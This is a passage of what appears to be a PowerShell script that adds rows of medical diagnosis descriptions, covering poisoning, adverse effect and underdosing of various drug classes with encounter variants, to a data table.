$DiagnosisList.Rows.Add("Poisoning by unspecified drugs primarily affecting the autonomic nervous system, accidental (unintentional)","Poisoning by unspecified drugs primarily affecting the autonomic nervous system, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs primarily affecting the autonomic nervous system, intentional self-harm","Poisoning by unspecified drugs primarily affecting the autonomic nervous system, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs primarily affecting the autonomic nervous system, intentional self-harm","Poisoning by unspecified drugs primarily affecting the autonomic nervous system, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs primarily affecting the autonomic nervous system, intentional self-harm","Poisoning by unspecified drugs primarily affecting the autonomic nervous system, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs primarily affecting the autonomic nervous system, assault","Poisoning by unspecified drugs primarily affecting the autonomic nervous system, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs primarily affecting the autonomic nervous system, assault","Poisoning by unspecified drugs primarily affecting the autonomic nervous system, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs primarily affecting the autonomic nervous system, assault","Poisoning by unspecified drugs primarily affecting the autonomic nervous system, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs primarily affecting the autonomic nervous system, undetermined","Poisoning by unspecified drugs primarily affecting the autonomic nervous system, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs primarily affecting the autonomic nervous system, undetermined","Poisoning by unspecified drugs primarily affecting the autonomic nervous system, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs primarily affecting the autonomic nervous system, undetermined","Poisoning by unspecified drugs primarily affecting the autonomic nervous system, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified drugs primarily affecting the autonomic nervous system","Adverse effect of unspecified drugs primarily affecting the autonomic nervous system, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified drugs primarily affecting the autonomic nervous system","Adverse effect of unspecified drugs primarily affecting the autonomic nervous system, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified drugs primarily affecting the autonomic nervous system","Adverse effect of unspecified drugs primarily affecting the autonomic nervous system, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified drugs primarily affecting the autonomic nervous system","Underdosing of unspecified drugs primarily affecting the autonomic nervous system, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified drugs primarily affecting the autonomic nervous system","Underdosing of unspecified drugs primarily affecting the autonomic nervous system, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified drugs primarily affecting the autonomic nervous system","Underdosing of unspecified drugs primarily affecting the autonomic nervous system, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other drug primarily affecting the autonomic nervous system, accidental (unintentional)","Poisoning by other drug primarily affecting the autonomic nervous system, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drug primarily affecting the autonomic nervous system, accidental (unintentional)","Poisoning by other drug primarily affecting the autonomic nervous system, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drug primarily affecting the autonomic nervous system, accidental (unintentional)","Poisoning by other drug primarily affecting the autonomic nervous system, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other drug primarily affecting the autonomic nervous system, intentional self-harm","Poisoning by other drug primarily affecting the autonomic nervous system, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drug primarily affecting the autonomic nervous system, intentional self-harm","Poisoning by other drug primarily affecting the autonomic nervous system, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drug primarily affecting the autonomic nervous system, intentional self-harm","Poisoning by other drug primarily affecting the autonomic nervous system, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other drug primarily affecting the autonomic nervous system, assault","Poisoning by other drug primarily affecting the autonomic nervous system, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drug primarily affecting the autonomic nervous system, assault","Poisoning by other drug primarily affecting the autonomic nervous system, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drug primarily affecting the autonomic nervous system, assault","Poisoning by other drug primarily affecting the autonomic nervous system, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other drug primarily affecting the autonomic nervous system, undetermined","Poisoning by other drug primarily affecting the autonomic nervous system, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drug primarily affecting the autonomic nervous system, undetermined","Poisoning by other drug primarily affecting the autonomic nervous system, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drug primarily affecting the autonomic nervous system, undetermined","Poisoning by other drug primarily affecting the autonomic nervous system, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other drug primarily affecting the autonomic nervous system","Adverse effect of other drug primarily affecting the autonomic nervous system, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other drug primarily affecting the autonomic nervous system","Adverse effect of other drug primarily affecting the autonomic nervous system, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other drug primarily affecting the autonomic nervous system","Adverse effect of other drug primarily affecting the autonomic nervous system, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other drug primarily affecting the autonomic nervous system","Underdosing of other drug primarily affecting the autonomic nervous system, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other drug primarily affecting the autonomic nervous system","Underdosing of other drug primarily affecting the autonomic nervous system, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other drug primarily affecting the autonomic nervous system","Underdosing of other drug primarily affecting the autonomic nervous system, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antiallergic and antiemetic drugs, accidental (unintentional)","Poisoning by antiallergic and antiemetic drugs, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiallergic and antiemetic drugs, accidental (unintentional)","Poisoning by antiallergic and antiemetic drugs, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiallergic and antiemetic drugs, accidental (unintentional)","Poisoning by antiallergic and antiemetic drugs, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antiallergic and antiemetic drugs, intentional self-harm","Poisoning by antiallergic and antiemetic drugs, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiallergic and antiemetic drugs, intentional self-harm","Poisoning by antiallergic and antiemetic drugs, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiallergic and antiemetic drugs, intentional self-harm","Poisoning by antiallergic and antiemetic drugs, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antiallergic and antiemetic drugs, assault","Poisoning by antiallergic and antiemetic drugs, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiallergic and antiemetic drugs, assault","Poisoning by antiallergic and antiemetic drugs, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiallergic and antiemetic drugs, assault","Poisoning by antiallergic and antiemetic drugs, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antiallergic and antiemetic drugs, undetermined","Poisoning by antiallergic and antiemetic drugs, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiallergic and antiemetic drugs, undetermined","Poisoning by antiallergic and antiemetic drugs, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiallergic and antiemetic drugs, undetermined","Poisoning by antiallergic and antiemetic drugs, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of antiallergic and antiemetic drugs","Adverse effect of antiallergic and antiemetic drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antiallergic and antiemetic drugs","Adverse effect of antiallergic and antiemetic drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antiallergic and antiemetic drugs","Adverse effect of antiallergic and antiemetic drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of antiallergic and antiemetic drugs","Underdosing of antiallergic and antiemetic drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antiallergic and antiemetic drugs","Underdosing of antiallergic and antiemetic drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antiallergic and antiemetic drugs","Underdosing of antiallergic and antiemetic drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antineoplastic and immunosuppressive drugs, accidental (unintentional)","Poisoning by antineoplastic and immunosuppressive drugs, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antineoplastic and immunosuppressive drugs, accidental (unintentional)","Poisoning by antineoplastic and immunosuppressive drugs, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antineoplastic and immunosuppressive drugs, accidental (unintentional)","Poisoning by antineoplastic and immunosuppressive drugs, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antineoplastic and immunosuppressive drugs, intentional self-harm","Poisoning by antineoplastic and immunosuppressive drugs, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antineoplastic and immunosuppressive drugs, intentional self-harm","Poisoning by antineoplastic and immunosuppressive drugs, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antineoplastic and immunosuppressive drugs, intentional self-harm","Poisoning by antineoplastic and immunosuppressive drugs, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antineoplastic and immunosuppressive drugs, assault","Poisoning by antineoplastic and immunosuppressive drugs, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antineoplastic and immunosuppressive drugs, assault","Poisoning by antineoplastic and immunosuppressive drugs, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antineoplastic and immunosuppressive drugs, assault","Poisoning by antineoplastic and immunosuppressive drugs, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antineoplastic and immunosuppressive drugs, undetermined","Poisoning by antineoplastic and immunosuppressive drugs, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antineoplastic and immunosuppressive drugs, undetermined","Poisoning by antineoplastic and immunosuppressive drugs, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antineoplastic and immunosuppressive drugs, undetermined","Poisoning by antineoplastic and immunosuppressive drugs, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of antineoplastic and immunosuppressive drugs","Adverse effect of antineoplastic and immunosuppressive drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antineoplastic and immunosuppressive drugs","Adverse effect of antineoplastic and immunosuppressive drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antineoplastic and immunosuppressive drugs","Adverse effect of antineoplastic and immunosuppressive drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of antineoplastic and immunosuppressive drugs","Underdosing of antineoplastic and immunosuppressive drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antineoplastic and immunosuppressive drugs","Underdosing of antineoplastic and immunosuppressive drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antineoplastic and immunosuppressive drugs","Underdosing of antineoplastic and immunosuppressive drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by vitamins, accidental (unintentional)","Poisoning by vitamins, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by vitamins, accidental (unintentional)","Poisoning by vitamins, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by vitamins, accidental (unintentional)","Poisoning by vitamins, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by vitamins, intentional self-harm","Poisoning by vitamins, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by vitamins, intentional self-harm","Poisoning by vitamins, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by vitamins, intentional self-harm","Poisoning by vitamins, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by vitamins, assault","Poisoning by vitamins, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by vitamins, assault","Poisoning by vitamins, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by vitamins, assault","Poisoning by vitamins, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by vitamins, undetermined","Poisoning by vitamins, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by vitamins, undetermined","Poisoning by vitamins, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by vitamins, undetermined","Poisoning by vitamins, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of vitamins","Adverse effect of vitamins, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of vitamins","Adverse effect of vitamins, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of vitamins","Adverse effect of vitamins, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of vitamins","Underdosing of vitamins, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of vitamins","Underdosing of vitamins, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of vitamins","Underdosing of vitamins, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by enzymes, accidental (unintentional)","Poisoning by enzymes, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by enzymes, accidental (unintentional)","Poisoning by enzymes, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by enzymes, accidental (unintentional)","Poisoning by enzymes, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by enzymes, intentional self-harm","Poisoning by enzymes, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by enzymes, intentional self-harm","Poisoning by enzymes, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by enzymes, intentional self-harm","Poisoning by enzymes, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by enzymes, assault","Poisoning by enzymes, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by enzymes, assault","Poisoning by enzymes, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by enzymes, assault","Poisoning by enzymes, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by enzymes, undetermined","Poisoning by enzymes, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by enzymes, undetermined","Poisoning by enzymes, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by enzymes, undetermined","Poisoning by enzymes, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of enzymes","Adverse effect of enzymes, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of enzymes","Adverse effect of enzymes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of enzymes","Adverse effect of enzymes, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of enzymes","Underdosing of enzymes, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of enzymes","Underdosing of enzymes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of enzymes","Underdosing of enzymes, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by iron and its compounds, accidental (unintentional)","Poisoning by iron and its compounds, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by iron and its compounds, accidental (unintentional)","Poisoning by iron and its compounds, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by iron and its compounds, accidental (unintentional)","Poisoning by iron and its compounds, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by iron and its compounds, intentional self-harm","Poisoning by iron and its compounds, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by iron and its compounds, intentional self-harm","Poisoning by iron and its compounds, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by iron and its compounds, intentional self-harm","Poisoning by iron and its compounds, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by iron and its compounds, assault","Poisoning by iron and its compounds, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by iron and its compounds, assault","Poisoning by iron and its compounds, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by iron and its compounds, assault","Poisoning by iron and its compounds, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by iron and its compounds, undetermined","Poisoning by iron and its compounds, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by iron and its compounds, undetermined","Poisoning by iron and its compounds, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by iron and its compounds, undetermined","Poisoning by iron and its compounds, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of iron and its compounds","Adverse effect of iron and its compounds, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of iron and its compounds","Adverse effect of iron and its compounds, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of iron and its compounds","Adverse effect of iron and its compounds, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of iron and its compounds","Underdosing of iron and its compounds, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of iron and its compounds","Underdosing of iron and its compounds, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of iron and its compounds","Underdosing of iron and its compounds, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulants, accidental (unintentional)","Poisoning by anticoagulants, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulants, accidental (unintentional)","Poisoning by anticoagulants, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulants, accidental (unintentional)","Poisoning by anticoagulants, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulants, intentional self-harm","Poisoning by anticoagulants, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulants, intentional self-harm","Poisoning by anticoagulants, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulants, intentional self-harm","Poisoning by anticoagulants, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulants, assault","Poisoning by anticoagulants, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulants, assault","Poisoning by anticoagulants, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulants, assault","Poisoning by anticoagulants, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulants, undetermined","Poisoning by anticoagulants, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulants, undetermined","Poisoning by anticoagulants, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulants, undetermined","Poisoning by anticoagulants, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of anticoagulants","Adverse effect of anticoagulants, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of anticoagulants","Adverse effect of anticoagulants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of anticoagulants","Adverse effect of anticoagulants, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of anticoagulants","Underdosing of anticoagulants, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of anticoagulants","Underdosing of anticoagulants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of anticoagulants","Underdosing of anticoagulants, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antithrombotic drugs, accidental (unintentional)","Poisoning by antithrombotic drugs, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antithrombotic drugs, accidental (unintentional)","Poisoning by antithrombotic drugs, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antithrombotic drugs, accidental (unintentional)","Poisoning by antithrombotic drugs, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antithrombotic drugs, intentional self-harm","Poisoning by antithrombotic drugs, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antithrombotic drugs, intentional self-harm","Poisoning by antithrombotic drugs, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antithrombotic drugs, intentional self-harm","Poisoning by antithrombotic drugs, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antithrombotic drugs, assault","Poisoning by antithrombotic drugs, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antithrombotic drugs, assault","Poisoning by antithrombotic drugs, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antithrombotic drugs, assault","Poisoning by antithrombotic drugs, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antithrombotic drugs, undetermined","Poisoning by antithrombotic drugs, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antithrombotic drugs, undetermined","Poisoning by antithrombotic drugs, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antithrombotic drugs, undetermined","Poisoning by antithrombotic drugs, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of antithrombotic drugs","Adverse effect of antithrombotic drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antithrombotic drugs","Adverse effect of antithrombotic drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antithrombotic drugs","Adverse effect of antithrombotic drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of antithrombotic drugs","Underdosing of antithrombotic drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antithrombotic drugs","Underdosing of antithrombotic drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antithrombotic drugs","Underdosing of antithrombotic drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified fibrinolysis-affecting drugs, accidental (unintentional)","Poisoning by unspecified fibrinolysis-affecting drugs, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified fibrinolysis-affecting drugs, accidental (unintentional)","Poisoning by unspecified fibrinolysis-affecting drugs, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified fibrinolysis-affecting drugs, accidental (unintentional)","Poisoning by unspecified fibrinolysis-affecting drugs, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified fibrinolysis-affecting drugs, intentional self-harm","Poisoning by unspecified fibrinolysis-affecting drugs, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified fibrinolysis-affecting drugs, intentional self-harm","Poisoning by unspecified fibrinolysis-affecting drugs, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified fibrinolysis-affecting drugs, intentional self-harm","Poisoning by unspecified fibrinolysis-affecting drugs, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified fibrinolysis-affecting drugs, assault","Poisoning by unspecified fibrinolysis-affecting drugs, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified fibrinolysis-affecting drugs, assault","Poisoning by unspecified fibrinolysis-affecting drugs, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified fibrinolysis-affecting drugs, assault","Poisoning by unspecified fibrinolysis-affecting drugs, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified fibrinolysis-affecting drugs, undetermined","Poisoning by unspecified fibrinolysis-affecting drugs, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified fibrinolysis-affecting drugs, undetermined","Poisoning by unspecified fibrinolysis-affecting drugs, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified fibrinolysis-affecting drugs, undetermined","Poisoning by unspecified fibrinolysis-affecting drugs, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified fibrinolysis-affecting drugs","Adverse effect of unspecified fibrinolysis-affecting drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified fibrinolysis-affecting drugs","Adverse effect of unspecified fibrinolysis-affecting drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified fibrinolysis-affecting drugs","Adverse effect of unspecified fibrinolysis-affecting drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified fibrinolysis-affecting drugs","Underdosing of unspecified fibrinolysis-affecting drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified fibrinolysis-affecting drugs","Underdosing of unspecified fibrinolysis-affecting drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified fibrinolysis-affecting drugs","Underdosing of unspecified fibrinolysis-affecting drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by thrombolytic drug, accidental (unintentional)","Poisoning by thrombolytic drug, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by thrombolytic drug, accidental (unintentional)","Poisoning by thrombolytic drug, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by thrombolytic drug, accidental (unintentional)","Poisoning by thrombolytic drug, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by thrombolytic drug, intentional self-harm","Poisoning by thrombolytic drug, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by thrombolytic drug, intentional self-harm","Poisoning by thrombolytic drug, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by thrombolytic drug, intentional self-harm","Poisoning by thrombolytic drug, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by thrombolytic drug, assault","Poisoning by thrombolytic drug, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by thrombolytic drug, assault","Poisoning by thrombolytic drug, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by thrombolytic drug, assault","Poisoning by thrombolytic drug, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by thrombolytic drug, undetermined","Poisoning by thrombolytic drug, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by thrombolytic drug, undetermined","Poisoning by thrombolytic drug, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by thrombolytic drug, undetermined","Poisoning by thrombolytic drug, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of thrombolytic drugs","Adverse effect of thrombolytic drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of thrombolytic drugs","Adverse effect of thrombolytic drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of thrombolytic drugs","Adverse effect of thrombolytic drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of thrombolytic drugs","Underdosing of thrombolytic drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of thrombolytic drugs","Underdosing of thrombolytic drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of thrombolytic drugs","Underdosing of thrombolytic drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by hemostatic drug, accidental (unintentional)","Poisoning by hemostatic drug, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by hemostatic drug, accidental (unintentional)","Poisoning by hemostatic drug, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by hemostatic drug, accidental (unintentional)","Poisoning by hemostatic drug, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by hemostatic drug, intentional self-harm","Poisoning by hemostatic drug, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by hemostatic drug, intentional self-harm","Poisoning by hemostatic drug, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by hemostatic drug, intentional self-harm","Poisoning by hemostatic drug, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by hemostatic drug, assault","Poisoning by hemostatic drug, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by hemostatic drug, assault","Poisoning by hemostatic drug, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by hemostatic drug, assault","Poisoning by hemostatic drug, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by hemostatic drug, undetermined","Poisoning by hemostatic drug, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by hemostatic drug, undetermined","Poisoning by hemostatic drug, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by hemostatic drug, undetermined","Poisoning by hemostatic drug, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of hemostatic drug","Adverse effect of hemostatic drug, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of hemostatic drug","Adverse effect of hemostatic drug, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of hemostatic drug","Adverse effect of 